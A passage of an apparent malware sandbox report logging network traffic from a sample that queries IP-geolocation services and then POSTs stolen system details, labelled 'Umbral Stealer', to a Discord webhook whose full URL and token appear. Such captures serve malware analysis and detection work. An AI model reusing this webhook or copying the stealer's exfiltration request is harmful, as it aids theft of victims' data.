                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2596cdc0b180d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:20 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      39192.168.2.549774104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:21 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:21 UTC731INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:21 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33356
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT8M6SNEAJGP7KF9K2AGK
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIPDCnXRrF5UFYEaGGNMeOByMnPUGRJCdYS4HiijT3L622POJbuVmZLmXzO0NlQKoaCDDoJqtUqy4QulAu795%2FeCDXtuGMSoFjqZepUKUk0raaDDlDHP0WAVRQL0"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25970b8e4c33e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:21 UTC638INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:21 UTC1369INData Raw: 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68
                                      Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh
                                      2024-09-06 23:48:21 UTC1082INData Raw: 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20
                                      Data Ascii: ath fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:48:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      40192.168.2.549776188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:23 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:23 UTC643INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:23 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uLv%2B5onN7umQtZzh9hIVi1vAKcEBHjq6S9tmzkHJi%2F4jkiEm8qSecOQL86Nkuh5fQrXhqWlQsXp09%2B%2BVGfxbWmECIQXnYCrs3LMj7PqEUSle9and7xbZKzRltECT3n%2Bj"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2597cdd24c445-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:23 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      41192.168.2.549778104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:23 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:23 UTC732INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7904
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTB36ZXH120ESFFBFTB5W
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hcae5LDQ5w%2Fq4ZwXH%2FdwgweebvJCgR5s8oK3moC98jUHkBVCRioGWGyMaroWfZo5qiv785f77Th2dZKqQYQ2FC6W8JotWHzkvBm4xyYC01loswjVknvA8DOlWSN8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2598089b2434a-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:23 UTC637INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:23 UTC1369INData Raw: 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76
                                      Data Ascii: ; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100v
                                      2024-09-06 23:48:23 UTC1083INData Raw: 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36
                                      Data Ascii: path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:48:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      42192.168.2.549780188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:25 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:25 UTC637INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:25 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swQ51pXKbx4zhNlzt3cUJlHcwjwqhqSHkvc2Dm9N2gG8QWBFPpfT5qPRS9n294izLA%2BoNkyP5A0HTokbGTQKRaT%2Fo5Aat9E8ovSKUT8hIiEm5jQrC64pKezc1u7s1baS"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2598aca934358-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:25 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      43192.168.2.549781104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:25 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:26 UTC741INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33361
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTDTQVG8PGMEA6ESZANNE
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hK1%2FaoW8Wrlo0mYPgZleMLtCRkVOnOS%2FHNHblxiAm8BGVuGbyCA8ZqGJSl8PGfG%2F9v84Y%2Fm%2FOCqfHMkiKHGptBdJv89JYZS442%2FNgCMIEv6N4YmNsiUANWZdn3Ia"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25991fd301a28-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:26 UTC628INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:26 UTC1369INData Raw: 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69
                                      Data Ascii: adding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; hei
                                      2024-09-06 23:48:26 UTC1092INData Raw: 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7
                                      2024-09-06 23:48:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      44192.168.2.549784188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:30 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:30 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:30 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:30 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OG%2FvU4B5ecaVxOHp86RrbqqZPi3Z%2FQfIVKDE1GcVZHyCCkFRPS5gj0gcAglqU5DHKfiHZJDdnf1k3mD%2B4qmngEl%2FZwhMU7lSD3xSaCBJMu5uC87cC149ICTD3WY0MIf9"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259a8bc194232-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:30 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      45192.168.2.549786162.159.135.232443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:31 UTC360OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:31 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:48:31 UTC941OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                      Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:48:31 UTC1369INHTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:48:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=85cdf00e6caa11ef9b3df2c32ce171c1; Expires=Wed, 05-Sep-2029 23:48:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666512
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0M6vpGVF3VL%2FGDHQ78jAS6%2FyP2C7QjJ254zJbmpehLg%2Fqq%2F0qBlguOBKzdzk%2FbiMBNXuUIDptVSxastBDztY7rU6ZQYU2RH1g3bs9YR1FNmUfHH1ntjBp5J2aXj"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=85cdf00e6caa11ef9b3df2c32ce171c137218182d8aa374246002fbc2930300cdb6665d1191f1663e70ffce071df6d96; Expires=Wed, 05-Sep-2029 23:48:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=e26c311cc7ee22793530bb2999f806ab38f7e645-1725666511; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie:
